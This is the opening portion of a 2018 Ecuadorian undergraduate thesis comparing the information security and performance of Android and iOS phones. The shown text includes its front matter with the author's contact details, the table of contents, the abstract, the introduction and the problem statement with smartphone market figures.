INGENIERO EN SISTEMAS COMPUTACIONALESrepositorio.ug.edu.ec/bitstream/redug/28256/1/B-CISC-PTG....
Transcript of INGENIERO EN SISTEMAS COMPUTACIONALESrepositorio.ug.edu.ec/bitstream/redug/28256/1/B-CISC-PTG....
UNIVERSIDAD DE GUAYAQUIL
FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS
CARRERA DE INGENIERÍA EN SISTEMAS
COMPUTACIONALES
ANÁLISIS COMPARATIVO EN TÉRMINOS DE SEGURIDAD
DE LA INFORMACIÓN Y RENDIMIENTO ENTRE
SISTEMAS OPERATIVOS ANDROID E IOS
EN TELÉFONOS MÓVILES.
PROYECTO DE TITULACIÓN
Previa a la obtención del Título de:
INGENIERO EN SISTEMAS COMPUTACIONALES
AUTORA: RUTH ALEXANDRA ASQUI YÁNEZ
TUTORA: ING. KARLA YADIRA ABAD SACOTO, M.Sc.
GUAYAQUIL - ECUADOR
2018
II
REPOSITORIO NACIONAL EN CIENCIAS Y TECNOLOGÍA
FICHA DE REGISTRO DE TESIS
TÍTULO “Análisis comparativo en términos de seguridad de la información y rendimiento entre sistemas operativos Android e iOS en teléfonos móviles”
AUTOR: Ruth Alexandra Asqui Yánez
REVISORES: Ing. Fabricio Felipe Medina Palacios, Mgs.
INSTITUCIÓN: Universidad de Guayaquil
FACULTAD: Ciencias Matemáticas y Físicas
CARRERA: Ingeniería en Sistemas Computacionales
FECHA DE PUBLICACIÓN: N° DE PÁGS.: 147 pág.
ÁREA TEMÁTICA: Investigación y Seguridad en tecnología móvil
PALABRAS CLAVES: Análisis comparativo, seguridad de la información, rendimiento, Android, iOS.
RESUMEN: La elaboración de este proyecto, consiste en realizar un breve análisis de
los problemas que existen en los términos de seguridad de la información y rendimiento en los teléfonos móviles. Esto encaminó a realizar un análisis comparativo en los sistemas operativos móviles que lideran el mercado tecnológico en la actualidad, en los términos mencionados anteriormente. El objetivo principal es brindar una guía de recomendaciones a los usuarios estableciendo los beneficios que ofrecen Android e iOS al momento de adquirir un teléfono móvil. Para el estudio de seguridad de la información y rendimiento se establecieron criterios que validan la evaluación de cada término a estudiar. Para el rendimiento se tomaron en cuenta varias versiones de teléfonos y se eligió la herramienta de medición AnTutu como resultado la investigación de estudios anteriores, se realizaron varias pruebas hasta obtener resultados claros para determinar el mejor sistema operativo mediante la metodología cualitativa, cuantitativa y enfoque de observación. También se realizaron varias pruebas de seguridad de la información para establecer qué tan seguros son los sistemas operativos; mediante ataques informáticos utilizando herramientas de seguridad informática. De acuerdo a los resultados obtenidos en el análisis comparativo se logró establecer una guía de recomendaciones para los usuarios; donde se establecen los beneficios que ofrecen los sistemas operativos móviles con respecto a cada término estudiado.
N° DE REGISTRO: N° DE CLASIFICACIÓN:
DIRECCIÓN URL (tesis en la web):
ADJUNTO PDF X SI NO
CONTACTO CON AUTOR: Ruth Alexandra Asqui Yánez
Teléfono:
0939858299 E-mail: [email protected]
CONTACTO DE LA INSTITUCIÓN
Nombre: Ab. Juan Chávez Atocha
Teléfono: 2307729
III
APROBACIÓN DEL TUTOR
En mi calidad de Tutor del trabajo de investigación, “Análisis comparativo
en términos de seguridad de la información y rendimiento entre sistemas
operativos Android e iOS en teléfonos móviles” elaborado por la Srta. Asqui
Yánez Ruth Alexandra de la Carrera de Ingeniería en Sistemas
Computacionales, Facultad de Ciencias Matemáticas y Físicas de la
Universidad de Guayaquil, previo a la obtención del Título de Ingeniero en
Sistemas Computacionales, me permito declarar que luego de haber
orientado, estudiado y revisado, la Apruebo en todas sus partes.
Atentamente
Ing. Karla Yadira Abad Sacoto, M.Sc.
TUTOR
IV
DEDICATORIA
Este trabajo está dedicado a DIOS
por permitir culminar esta meta y
ayudar a realizar este proyecto, ya
que ha sido el pilar fundamental en
mi vida a pesar de las circunstancias,
siempre estuvo presente.
A mi abuelo ejemplar Luis Asqui, por
estar presente siempre en mi
corazón y recuerdos a pesar de no
estar presente físicamente
A mis padres Blanca Yánez y César
Asqui por regalarme esta gran
herencia, el estudio; ya que siempre
me apoyaron económicamente,
recurso importante que ha servido
para continuar estudiando y llegar a
cumplir esta meta.
V
AGRADECIMIENTO
Agradezco a DIOS, por ayudarme a
realizar este proyecto, gracias a él se
logró realizar este trabajo de
titulación, estuvo presente desde el
inicio hasta el final de este proceso;
siempre brindándome su ayuda.
A mi tutora Ing. Karla Abad, por ser la
guía y ayuda que requiere el
desarrollo de este proyecto.
A mi amiga Briggitte Bravo, por estar
presente de alguna manera durante
el proceso del desarrollo de este
proyecto.
VI
TRIBUNAL DEL PROYECTO DE TITULACIÓN
Ing. Eduardo Santos Baquerizo, M.Sc.
DECANO DE LA FACULTAD CIENCIAS MATEMÁTICAS Y
FÍSICAS
Ing. Abel Alarcón Salvatierra, M.Gs. DIRECTOR DE LA CARRERA DE
INGENIERÍA EN SISTEMAS COMPUTACIONALES
Ing. Karla Abad Sacoto, M.Sc. PROFESOR TUTOR DEL
PROYECTO DE TITULACIÓN
Ing. Fabricio Medina Palacios, Mgs. PROFESOR REVISOR DEL AREA
TRIBUNAL
Ab. Juan Chávez Atocha, Esp SECRETARIO
VII
DECLARACIÓN EXPRESA
“La responsabilidad del contenido
de este Proyecto de Titulación, me
corresponden exclusivamente; y el
patrimonio intelectual de la misma a
la UNIVERSIDAD DE GUAYAQUIL”
ASQUI YÁNEZ RUTH ALEXANDRA
VIII
UNIVERSIDAD DE GUAYAQUIL
FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS
CARRERA DE INGENIERÍA EN SISTEMAS
COMPUTACIONALES
ANÁLISIS COMPARATIVO EN TÉRMINOS DE SEGURIDAD
DE LA INFORMACIÓN Y RENDIMIENTO ENTRE
SISTEMAS OPERATIVOS ANDROID E IOS
EN TELÉFONOS MÓVILES.
Proyecto de Titulación que se presenta como requisito para optar por el
título de INGENIERO EN SISTEMAS COMPUTACIONALES
:
Autora: ASQUI YÁNEZ RUTH ALEXANDRA
C.I. 0927392415
Tutora: ING. KARLA YADIRA ABAD SACOTO, M.Sc.
Guayaquil, Marzo de 2018
IX
CERTIFICADO DE ACEPTACIÓN DEL TUTOR
En mi calidad de Tutor del Proyecto de Titulación, nombrado por el Consejo
Director de la Facultad de Ciencias Matemáticas y Físicas de la Universidad
de Guayaquil.
CERTIFICO:
Que he analizado el Proyecto de Titulación presentado por ella estudiante
Asqui Yánez Ruth Alexandra, como requisito previo para optar por el título
de Ingeniero en Sistemas Computacionales cuyo problema es:
“Análisis comparativo en términos de seguridad de la información y
rendimiento entre sistemas operativos Android e iOS en teléfonos
móviles”
Considero aprobado el trabajo en su totalidad.
Presentado por:
Asqui Yánez Ruth Alexandra
C.I. 0927392415
Tutora: Ing. Karla Yadira Abad Sacoto, M.Sc.
Guayaquil, Marzo de 2018
X
UNIVERSIDAD DE GUAYAQUIL FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS
CARRERA DE INGENIERÍA EN SISTEMAS COMPUTACIONALES
Autorización para Publicación de Proyecto de Titulación en
Formato Digital
1. Identificación del Proyecto de Titulación
Nombre Alumno: Asqui Yánez Ruth Alexandra
Dirección: Guayaquil, Sauces III, Mz.30F Villa N° 7
Teléfono: 0939858299 E-mail: [email protected]
Facultad: Ciencias Matemáticas y Físicas
Carrera: Ingeniería en Sistemas Computacionales
Título al que optan: Ingeniero en Sistemas Computacionales
Profesor guía: Ing. Karla Yadira Abad Sacoto, M.Sc.
Título del Proyecto de titulación: Análisis comparativo en términos de seguridad de la información y rendimiento entre sistemas operativos Android e iOS en teléfonos móviles.
Tema del Proyecto de Titulación: Seguridad de la información y
rendimiento en los sistemas operativos móviles Android e iOS
XI
2. Autorización de Publicación de Versión Electrónica del Proyecto de Titulación.
A través de este medio autorizado a la Biblioteca de la Universidad de
Guayaquil y a la Facultad de Ciencias Matemáticas y Físicas a publicar la
versión electrónica de este Proyecto de titulación.
Publicación electrónica:
Firma Alumno: Asqui Yánez Ruth Alexandra
C.I. 0927392415
3. Forma de envío: El texto del proyecto de titulación debe ser enviado en formato Word,
como archivo .Doc O .RTF y Puf para PC. Las imágenes que la
acompañen pueden ser .gif, jpg o .TIFF.
Inmediata X Después de 1 año
DVDROM CDROM X
XII
ÍNDICE GENERAL
APROBACIÓN DEL TUTOR ............................................................................... III
DEDICATORIA ................................................................................................... IV
AGRADECIMIENTO ............................................................................................ V
DECLARACIÓN EXPRESA ............................................................................... VII
CERTIFICADO DE ACEPTACIÓN DEL TUTOR ................................................. IX
Autorización para Publicación de Proyecto de Titulación en Formato Digital ....... X
ÍNDICE DE GRÁFICOS .................................................................................. XVII
ÍNDICE DE CUADROS ..................................................................................... XX
RESUMEN ...................................................................................................... XXII
ABSTRACT. .................................................................................................. XXIII
INTRODUCCIÓN ................................................................................................. 1
CAPITULO I ......................................................................................................... 3
EL PROBLEMA ................................................................................................... 3
PLANTEAMIENTO DEL PROBLEMA .................................................................. 3
Ubicación del problema en un contexto ............................................................ 5
Situación conflicto Nudos críticos ..................................................................... 6
Causas, consecuencias del problema .............................................................. 8
Delimitación del problema ................................................................................ 9
Formulación del Problema ............................................................................... 9
Evaluación del problema. ................................................................................. 9
OBJETIVOS DE LA INVESTIGACIÓN ............................................................... 11
Objetivo general ............................................................................................. 11
Objetivos específicos ..................................................................................... 11
ALCANCES DEL PROBLEMA ........................................................................... 12
JUSTIFICACIÓN E IMPORTANCIA ................................................................... 12
Metodología del proyecto ............................................................................... 13
CAPITULO II ...................................................................................................... 14
MARCO TEÓRICO ............................................................................................ 14
ANTECEDENTES DEL ESTUDIO ..................................................................... 14
FUNDAMENTACIÓN TEÓRICA ........................................................................ 17
Sistema operativo .......................................................................................... 17 Definiciones ................................................................................................ 17
Tipos de sistemas operativos móviles ........................................................ 18
XIII
Conceptos básicos de seguridad ................................................................... 24 Confidencialidad ......................................................................................... 24
Integridad ................................................................................................... 24
Disponibilidad ............................................................................................. 25
Autentificación ............................................................................................ 25
El no repudio .............................................................................................. 25
Dispositivo móvil. ........................................................................................... 25 Tipos de dispositivos móviles. .................................................................... 25
Capas de seguridad en dispositivos móviles............................................... 26
Ataques .......................................................................................................... 26 Ataques y amenazas en Android e iOS ...................................................... 27
FUNDAMENTACIÓN LEGAL ............................................................................. 31
Capítulo tercero “Delitos contra los Derechos del Buen Vivir” ........................ 32 Sección tercera “Delitos contra la seguridad de los activos de los sistemas
de información y comunicación” ................................................................. 32
Capítulo segundo “Delitos contra los Derechos de libertad” ........................... 34 Sección sexta “Delitos contra el derecho a la intimidad personal y familiar” 34
PREGUNTAS CIENTÍFICAS A CONTESTAR ................................................... 35
VARIABLES DE LA INVESTIGACIÓN. .............................................................. 35
DEFINICIONES CONCEPTUALES ................................................................... 35
Seguridad de la información ........................................................................... 35
Seguridad informática .................................................................................... 36
Seguridad ....................................................................................................... 36
Rendimiento ................................................................................................... 36
Datos ............................................................................................................. 36
Información .................................................................................................... 36
Vulnerabilidad ................................................................................................ 37
Amenazas ...................................................................................................... 37
Riesgos .......................................................................................................... 37
Hardware ....................................................................................................... 37
Software ......................................................................................................... 37
Malware ......................................................................................................... 38
Virus ............................................................................................................... 38
Gama alta de teléfonos .................................................................................. 38
XIV
Gama baja de teléfonos ................................................................................. 38
Stand-alone .................................................................................................... 38
Ciberdelincuentes .......................................................................................... 39
CAPÍTULO III ..................................................................................................... 40
Análisis de factibilidad .................................................................................... 40 Factibilidad operativa .................................................................................. 40
Factibilidad técnica ..................................................................................... 41
Factibilidad legal ......................................................................................... 45
Factibilidad económica ............................................................................... 45
METODOLOGÍA DE LA INVESTIGACIÓN ........................................................ 48
DISEÑO DE LA INVESTIGACIÓN ..................................................................... 48
Modalidad de la Investigación ........................................................................ 48
Tipo de investigación...................................................................................... 49 Investigación comparativa .......................................................................... 49
Investigación observacional ........................................................................ 49
Población y muestra ....................................................................................... 49 Población .................................................................................................... 49
Muestra ...................................................................................................... 51
OPERACIONALIZACIÓN DE VARIABLES ........................................................ 53
INSTRUMENTOS DE RECOLECCIÓN DE DATOS .......................................... 56
PROCEDIMIENTOS DE LA INVESTIGACIÓN .................................................. 56
RECOLECCIÓN DE INFORMACIÓN ................................................................ 58
PROCESAMIENTO Y ANÁLISIS ....................................................................... 58
Procesamiento y análisis comparativo en los sistemas operativos móviles .... 58 1. Seleccionar criterios a evaluar, para cada término a comparar ............... 59
2. Seleccionar herramientas para el análisis comparativo de seguridad de la
información y rendimiento. .......................................................................... 60
3. Proceso de evaluación............................................................................ 64
4. Resultados del análisis. .......................................................................... 90
CAPITULO IV .................................................................................................... 98
RESULTADOS, CONCLUSIONES Y RECOMENDACIONES ........................... 98
Resultados ..................................................................................................... 98
Conclusiones ............................................................................................... 100
Recomendaciones ....................................................................................... 101
XV
BIBLIOGRAFÍA ................................................................................................ 102
ANEXOS ......................................................................................................... 107
XVI
ABREVIATURAS Y SIGLAS
Ing. Ingeniero
IDC International Data Corporation
Lab Laboratorio
J2ME Java 2 Micro Edition
Apple All People Promoting Literacy Efforts
UOC Universitat Oberta de Catalunya
SO Sistema operativo
RIM Reaseach In Motion
API Application Programming Interface
SMS Short Message Service
JAVA Just Another Vague Acronym
Mac Macintosh
BSD Berkeley Software Distribution
SDK Software Development Kit
DNS Domain name
SSH Secure SHell
GPS Global Positioning System
COIP Codigo Organico Integral Penal
XVII
ÍNDICE DE GRÁFICOS
GRÁFICO N° 1
ESTADÍSTICA DE CREACIÓN DE MALWARE PARA SISTEMAS ..................... 7
GRÁFICO N° 2
ARQUITECTURA DE ANDROID ....................................................................... 20
GRÁFICO N° 3
ARQUITECTURA DE IOS ................................................................................. 23
GRÁFICO N° 4
SISTEMAS OPERATIVOS DE TELÉFONOS MÓVILES .................................... 50
GRÁFICO N° 5
VERSIONES DE SISTEMA OPERATIVO iOS .................................................. 51
GRÁFICO N° 6
VERSIONES DE SISTEMA OPERATIVO ANDROID ........................................ 52
GRÁFICO N° 7
PROVEEDORES DE DISPOSITIVOS MÓVILES ............................................... 53
GRÁFICO N° 8
REDIRECCIÓN DE HTTP EN ANDROID .......................................................... 65
GRÁFICO N° 9
DENEGACIÓN DE SERVICIO EN ANDROID .................................................... 66
GRÁFICO N° 10
DENEGACIÓN DE SERVICIO EN ANDROID .................................................... 67
GRÁFICO N° 11
PROCESO DE INSERCIÓN DE IMAGEN EN ANDROID .................................. 68
GRÁFICO N° 12
INFORMACIÓN ACCEDIDA EN ANDROID ....................................................... 69
GRÁFICO N° 13
CREACIÓN DE VIRUS PARA ANDROID .......................................................... 70
GRÁFICO N° 14
PROCESO DE INSTALACIÓN DE VIRUS EN ANDROID ................................. 71
GRÁFICO N° 15
COMANDOS DE ACCESO EN ANDROID ......................................................... 72
GRÁFICO N° 16
ENVIO DE MENSAJE A ANDROID ................................................................... 73
XVIII
GRÁFICO N° 17
LISTA DE CONTACTOS DESCARGADOS DE LA VÍCTIMA............................. 74
GRÁFICO N° 18
PANTALLA DE INFORMACIÓN ACCEDIDA DE ANDROID .............................. 75
GRÁFICO N° 19
DENEGACIÓN DE SERVICIO EN iOS .............................................................. 76
GRÁFICO N° 20
PROCESO DE INSERCIÓN DE IMAGEN EN iOS ............................................. 77
GRÁFICO N° 21
INFORMACIÓN ACCEDIDA EN IOS ................................................................. 78
GRÁFICO N° 22
TEST EN ANTUTU - SAMSUNG GALAXY J5 ................................................... 79
GRÁFICO N° 23
DIAGRAMA DE RENDIMIENTO/TIEMPO – SAMSUNG GALAXY J5 ................ 80
GRÁFICO N° 24
TEST EN ANTUTU - IPHONE 5 ........................................................................ 81
GRÁFICO N° 25
DIAGRAMA DE RENDIMIENTO/TIEMPO EN IPHONE 5 .................................. 82
GRÁFICO N° 26
TEST EN ANTUTU - SAMSUNG GALAXY J7 ................................................... 83
GRÁFICO N° 27
DIAGRAMA DE RENDIMIENTO/TIEMPO EN SAMSUNG GALAXY J7 ............. 85
GRÁFICO N° 28
TEST EN ANTUTU – iPHONE 6S ..................................................................... 86
GRÁFICO N° 29
DIAGRAMA DE RENDIMIENTO/TIEMPO – iPHONE 6S ................................... 87
GRÁFICO N° 30
TEST EN ANTUTU – iPHONE 7 ........................................................................ 89
GRÁFICO N° 31
ATAQUES INFORMÁTICOS EXITOSOS EN ANDROID E iOS ......................... 90
GRÁFICO N° 32
ATAQUES INFORMÁTICOS FALLIDOS EN ANDROID E iOS .......................... 91
GRÁFICO N° 33
ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY J5 E iPHONE 5 ....... 92
XIX
GRÁFICO N° 34
ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY J7 E iPHONE 6S ..... 93
GRÁFICO N° 35
ANÁLISIS COMPARATIVO ENTRE SAMSUNG GALAXY S8 E iPHONE 7 ....... 94
XX
ÍNDICE DE CUADROS
CUADRO N° 1
CAUSAS, CONSECUENCIAS DEL PROBLEMA................................................. 8
CUADRO N° 2
DELIMITACIÓN DEL PROBLEMA ....................................................................... 9
CUADRO N° 3
CARACTERÍSTICAS - SAMSUNG GALAXY J5 ................................................ 41
CUADRO N° 4
CARACTERÍSTICAS – IPHONE 5 ..................................................................... 42
CUADRO N° 5
CARACTERÍSTICAS - SAMSUNG GALAXY J7 ................................................ 42
CUADRO N° 6
CARACTERÍSTICAS - IPHONE 6S ................................................................... 43
CUADRO N° 7
CARACTERÍSTICAS – SAMSUNG GALAXY S8 ............................................... 43
CUADRO N° 8
CARACTERÍSTICAS - IPHONE 7..................................................................... 44
CUADRO N° 9
CARACTERÍSTICAS - LAPTOP ........................................................................ 44
CUADRO N° 10
COSTO TOTAL DEL PROYECTO ..................................................................... 45
CUADRO N° 11
OPERACIONALIZACIÓN DE VARIABLES ........................................................ 55
CUADRO N° 12
TÉRMINOS Y CRITERIOS DE ANÁLISIS ......................................................... 59
CUADRO N° 13
TÉRMINOS Y CRITERIOS DE SEGURIDAD DE LA INFORMACIÓN Y
RENDIMIENTO ................................................................................................. 61
CUADRO N° 14
RESULTADOS DE TESTS - SAMSUNG GALAXY J5 ....................................... 80
CUADRO N° 15
RESULTADOS DE TESTS - IPHONE 5 ............................................................ 82
XXI
CUADRO N° 16
RESULTADOS DE TESTS - SAMSUNG GALAXY J7 ....................................... 84
CUADRO N° 17
RESULTADOS DE TESTS - IPHONE 6S .......................................................... 86
CUADRO N° 18
RESULTADOS DE TESTS - SAMSUNG GALAXY S8 ....................................... 88
CUADRO N° 19
RESULTADOS DE TESTS - IPHONE 7 ............................................................ 89
XXII
UNIVERSIDAD DE GUAYAQUIL FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS
CARRERA DE INGENIERÍA EN SISTEMAS COMPUTACIONALES
ANÁLISIS COMPARATIVO EN TÉRMINOS DE SEGURIDAD DE LA INFORMACIÓN Y RENDIMIENTO ENTRE
SISTEMAS OPERATIVOS ANDROID E IOS EN TELÉFONOS MÓVILES
AUTORA: Ruth Alexandra Asqui Yánez
TUTORA: Ing. Karla Yadira Abad Sacoto, M.Sc.
RESUMEN
La elaboración de este proyecto consiste en realizar un breve análisis de los
problemas que existen en los términos de seguridad de la información y rendimiento
en los teléfonos móviles. Esto encaminó a realizar un análisis comparativo en los
sistemas operativos móviles que lideran el mercado tecnológico en la actualidad, en
los términos mencionados anteriormente. El objetivo principal es brindar una guía de
recomendaciones a los usuarios estableciendo los beneficios que ofrecen Android e
iOS al momento de adquirir un teléfono móvil. Para el estudio de seguridad de la
información y rendimiento se establecieron criterios que validan la evaluación de cada
término a estudiar. Para el rendimiento se tomaron en cuenta varias versiones de
teléfonos y se eligió la herramienta de medición AnTutu como resultado la
investigación de estudios anteriores, se realizaron varias pruebas hasta obtener
resultados claros para determinar el mejor sistema operativo mediante la metodología
cualitativa, cuantitativa y enfoque de observación. También se realizaron varias
pruebas de seguridad de la información para establecer qué tan seguros son los
sistemas operativos; mediante ataques informáticos utilizando herramientas de
seguridad informática. De acuerdo con los resultados obtenidos en el análisis
comparativo se logró establecer una guía de recomendaciones para los usuarios;
donde se establecen los beneficios que ofrecen los sistemas operativos móviles con
respecto a cada término estudiado.
Palabras claves: Análisis comparativo, seguridad de la información, rendimiento,
Android, iOS.
XXIII
UNIVERSIDAD DE GUAYAQUIL FACULTAD DE CIENCIAS MATEMÁTICAS Y FÍSICAS
CARRERA DE INGENIERÍA EN SISTEMAS COMPUTACIONALES
ANÁLISIS COMPARATIVO EN TÉRMINOS DE SEGURIDAD DE LA INFORMACIÓN Y RENDIMIENTO ENTRE
SISTEMAS OPERATIVOS ANDROID E IOS EN TELÉFONOS MÓVILES
AUTORA: Ruth Alexandra Asqui Yánez
TUTOR: Ing. Karla Yadira Abad Sacoto
ABSTRACT.
The elaboration of this project consists in carrying out a brief analysis of the problems
that exist in terms of information security and performance in mobile phones. This led
to a comparative analysis of the mobile operating systems that currently lead the
technology market, in the terms mentioned above. The main objective is to provide a
guide of recommendations to users, establishing the benefits offered by Android and
iOS when purchasing a mobile phone. For the study of information security and
performance, criteria were established that validate the evaluation of each term to be
studied. Several phone versions were taken into account for the performance and the
AnTutu measurement tool was chosen as a result of the research of previous studies,
several tests were carried out until clear results were obtained to determine the best
operating system through the qualitative, quantitative methodology and approach of
observation. Several information security tests were also conducted to establish how
secure the operating systems are; through computer attacks using computer security
tools. According to the results obtained in the comparative analysis, a guide of
recommendations for the users was established; where the benefits offered by mobile
operating systems are established with respect to each term studied
Keywords: Comparative analysis, information security, performance, Android, iOS
1
INTRODUCCIÓN
La investigación empieza debido a que los teléfonos móviles están gobernando
en las personas actualmente, dependiendo cada vez más de estos dispositivos,
ya que facilitan el realizar labores cotidianas y cumplen progresivamente las
propiedades de un computador. Además, las empresas están adoptando cada vez
el uso de esta tecnología en vista de que se puede almacenar información y
actualizar sus servicios al usuario.
Por esta razón surge la presencia de los ciberdelincuentes, quienes ahora están
enfocados en realizar ataques informáticos a los dispositivos móviles inteligentes,
dado que los usuarios tienen información importante, que les sirven a los
atacantes para adquirir dinero fácil e ilegal; atacando y vulnerando a la seguridad
de la información en los sistemas operativos de estos dispositivos.
Pero hay que recalcar que existen quejas regularmente de la seguridad de la
información y rendimiento que brindan los teléfonos inteligentes; esta es la mayor
razón por la que surge la investigación, debido a los problemas expuestos por los
usuarios. Por lo cual se procede a estudiar los dos sistemas operativos móviles
que lideran el mercado de la tecnología, Android e iOS.
El propósito real de la investigación es realizar un análisis comparativo referente
a la seguridad de la información y rendimiento entre Android e iOS y dar a conocer
cuál de los dos sistemas operativos le conviene usar al usuario y futuros usuarios.
Para llevar a cabo la investigación, se emplearán técnicas de estudio que
permitirán realizar el análisis comparativo en términos de seguridad de la
información y rendimiento mediante herramientas de software más utilizadas con
respecto a cada término a estudiar.
En el capítulo uno, se plantea el problema que existe en los usuarios con respecto
a la seguridad de la información y rendimiento entre Android e iOS, la importancia,
los objetivos y los alcances que abarcarán la investigación.
En el capítulo dos, se recopila información teórica importante que sirve para
entender los criterios de seguridad de la información y rendimiento en los sistemas
operativos, antecedentes de estudio que se enfocan al tema planteado y
2
definiciones conceptuales que dejarán en claro los términos empleados en este
trabajo y las leyes que protegen el desarrollo de la investigación.
En el capítulo tres, se detalla la metodología empleada para cumplir los objetivos
de la investigación, el proceso que se llevó a cabo para el análisis comparativo en
cada término estudiado, los resultados evaluados para poder elaborar la guía de
recomendaciones al usuario y por último se encuentra la guía de
recomendaciones que beneficien a los usuarios y futuros usuarios de teléfonos
móviles de Android e iOS.
Finalmente, el capítulo cuatro, es donde se plantean los resultados, conclusiones
del proceso del análisis comparativo entre Android e iOS, dando a conocer que se
cumplieron los objetivos planteados en la investigación realizada; y por último se
emiten recomendaciones para que el estudio realizado pueda ser desarrollado de
otra manera y con diferentes metodologías para verificar si los resultados son los
mismos.
3
CAPITULO I
EL PROBLEMA
PLANTEAMIENTO DEL PROBLEMA
Los primeros teléfonos móviles que salieron al mercado poseían sistemas muy
limitados con funciones básicas de recibir y enviar mensajes y realizar llamadas
telefónicas; aquellos sistemas, debido a sus limitaciones en recursos físicos y
funcionalidades, no son de interés para los atacantes. Los atacantes no se
enfocan en estos teléfonos, porque no son muy usados por los usuarios en la
actualidad y además solo poseen información básica o de bajo interés. (Prieto,
Ramírez, Morillo, & Prieto, 2011)
Por este motivo para el estudio del proyecto se consideraron solo los teléfonos
inteligentes y se dejaron a un lado a los primeros teléfonos móviles ya que no son
de interés para los atacantes.
En la actualidad, por el avance tecnológico en los teléfonos que surge muy a
menudo, las personas, desde los niños hasta los ancianos, poseen como mínimo
un teléfono inteligente con la finalidad de cubrir sus expectativas en la seguridad
de la información y rendimiento; siempre tratan de obtener el último modelo por
las nuevas características que innovan las marcas más vendidas en el mercado
de teléfono como Samsung, iPhone y Hawei.
Según (El Tiempo, 2017) La consultora IDC, señaló que en el primer trimestre del
año 2017, se vendieron 347,4 millones de teléfonos inteligentes, es decir la venta
aumentó un 4,3 por ciento con respeto al mismo período del año pasado.
Además, nos señaló las cinco marcas más vendidas entre enero y marzo del año
2017, las cuales fueron: Samsung, liderando con 79,2 millones, en segundo lugar,
está iPhone con 51,6 millones y en tercer lugar a Huawei con 34,2 millones, luego
Oppo con 25,6 millones y Vivo con 18,1 millones. Así nos damos cuenta de que
Samsung e iPhone son los líderes en la venta de teléfonos móviles. (El Tiempo,
2017)
Debido al uso masivo de teléfonos inteligentes, los usuarios, no le dan la debida
importancia al riesgo que corre su información, por la falta de seguridad que los
4
sistemas no han cubierto por completo; ya que buscan dispositivos que sean
rápidos.
El uso que tiene el teléfono inteligente es masivo, por la ayuda y facilidad que
propone mediante las aplicaciones de su tienda; desde entretenimiento hasta
realizar transacciones bancarias.
Por otra parte, (Rodríguez & Quimí, 2016) “El riesgo de la seguridad, en la red
corporativa, principalmente la amenaza latente de exposición de la información
confidencial en la empresa.”
El riesgo que corren las empresas, en la red corporativa es muy alto debido a que
la información tiene mucho valor, por tal motivo se llevará a cabo el estudio de las
falencias de los dos sistemas Android e iOS.
La tecnología móvil no logra proteger la información almacenada en el sistema
operativo; y los usuarios no aprovechan el rendimiento que brindan las nuevas
versiones que se ofrecen en el mercado de teléfono móvil. A continuación, se
describen criterios que limitan al usuario en la seguridad de la información y
rendimiento en los teléfonos:
✓ Limita elegir un teléfono móvil con el sistema operativo más seguro frente
a los ataques expuestos por el avance de esta tecnología. ‘
✓ Dificulta realizar alguna transacción bancaria en las aplicaciones que
brindan las entidades bancarias en las aplicaciones instaladas en teléfonos
móviles.
✓ Limita el acceso a redes públicas.
✓ Limita alcanzar lo propuesto por un teléfono inteligente ya sea por
hardware y software.
✓ Limita al usuario realizar actividades cotidianas, que se realicen en las
aplicaciones que ofrece cada tienda en los sistemas operativos móviles.
✓ Limita la ejecución de cualquier archivo o imagen multimedia.
✓ Limita la función correcta del sistema por sobrecarga de información en el
mismo tiempo.
5
Ubicación del problema en un contexto
La tecnología de teléfonos está presente en todo el mundo por la popularidad en
su mercado, por lo que cualquier usuario o empresa está expuesto a algún ataque
de seguridad en su información.
Según Gartner (2017) señaló que en el cuarto trimestre del año 2016, los sistemas
operativos de teléfonos inteligentes más vendidos a nivel mundial en el mercado
fueron: Android e iOS, con un 99.6 %. Android liderando con un 81.7 %, seguido
de iOS con un 17.9 % y otros con solo un 0.4 %.
¿Android e iOS?
Es la pregunta que se hacen los usuarios que usan éstas plataformas de celulares
más populares, después de los últimos meses del 2015, los dos sistemas
operativos en cuanto a la seguridad fue comprometida de una forma importante
(BBC, 2015). Es decir, los usuarios están con la interrogante de qué sistema
operativo utilizar, porque la seguridad en los dos sistemas operativos ha sido
comprometida a ataques.
“Los dos sistemas operativos, iOS y Android, tienen puntos fuertes y débiles.
Dependiendo del uso que des al celular, te resultará más seguro uno o el otro.”
(BBC, 2015)
Según BBC (2015): “La respuesta no es rotunda. Ambos tienen ventajas e
inconvenientes, según muestra un reciente informe comparativo realizado por la
compañía de seguridad y antivirus Panda Security.”
Al ser éstos los sistemas operativos mayormente utilizados, existen más ataques
para ambos en cuanto a la seguridad de la información como en rendimiento.
La mayoría de los ataques vulneran los sistemas operativos e incluso existen virus
que atacan el rendimiento del dispositivo a pesar de ser de gama alta.
Los usuarios tienen falta de conocimiento en el funcionamiento correcto del
software en los teléfonos inteligentes, no pueden aprovechar el rendimiento
completo que ofrece la plataforma que poseen entre sus manos.
6
Situación conflicto Nudos críticos
En el mundo se escucha o lee a menudo noticias de usuarios que son víctimas de
robo de información por los ciberdelincuentes, mediante ataques informáticos
afectando a personas y empresas que poseen dispositivos móviles; y también
criterios no motivados sobre el rendimiento de los teléfonos, por falta de
conocimiento que no permiten explotar al máximo los sistemas operativos en los
teléfonos inteligentes.
Existen muchos artículos de estudios realizados de seguridad en teléfonos
móviles de usuarios, que han sido víctimas de robo de información, en el capítulo
2 en la sección de Antecedentes en el artículo (Seguridad en dispositivos móviles
con sistemas operativos Android y iOS) se especifica un caso de estudio realizado
por (Albarracín, Camargo, & Parra, 2013) en la ciudad de Tunja - Colombia.
La falta de seguridad en los sistemas operativos ocurre porque los innovadores
de la tecnología móvil no alcanzan a cubrir todos los pilares fundamentales de
seguridad de la información, esto se da porque mientras más avanza la tecnología
en Smartphones los ciberdelincuentes también innovan para atacar el mercado de
dispositivos móviles.
Para las víctimas, si se trata de un usuario común, puede causarse daño moral
aparte de robo de dinero, debido a que se guarda información personal en los
teléfonos móviles. Si se trata de una empresa podrían perderse miles de dólares,
dependiendo de la empresa, por lo que la información para cada usuario tiene un
valor elevado.
A continuación en el Gráfico N° 1, se observa el crecimiento exponencial de
ataques en Android debido al elevado crecimiento en el mercado; resultados
obtenidos por Kaspersky Lab (Morelo & Betancur, 2013). Hay un gran número de
malware que atacan y roban información a estos dispositivos móviles; de igual
forma que crece el sistema operativo también crecen los ataques.
7
